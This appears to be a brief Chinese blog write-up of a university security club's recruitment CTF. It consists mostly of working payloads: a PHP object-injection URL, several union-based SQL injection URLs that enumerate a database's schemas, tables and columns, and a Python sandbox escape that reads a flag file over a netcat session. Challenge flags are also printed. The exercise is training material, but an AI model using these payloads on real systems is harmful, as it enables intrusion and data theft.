[清华网络安全技术协会招新](WEB)

没什么营养的文章，可以选择忽略不看，同样很久以前的文章了...

http://120.76.114.164:21080/web6/?pass=O%3A7%3A%22justfun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A2%3B%7D

image.png

http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(schema_name),%27b%27%20from%20information_schema.schemata%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(table_name),%27b%27%20from%20information_schema.tables%20where%20table_schema=%27web%27%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27user%27%20order%20by%201%20desc%23
id: id,name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web1_users%27%20order%20by%201%20desc%23
id: name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web3_users%27%20order%20by%201%20desc%23
id: id,name
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web4_messages%27%20order%20by%201%20desc%23
id: id,message
message: b

image.png

flag0

flag1

image.png

flag3

尼玛...四道题居然在同一台服务器上...
感觉整不好可以直接拿到服务器权限啊...

居然存在第二题...

image.png

~ ›› nc 120.76.114.164 12008                                                   
Give me your command!
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
inp= ().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
Return Value: ctf{pyth0n_1s_als0_unsaf3}

[清华网络安全技术协会招新](WEB)

推荐阅读更多精彩内容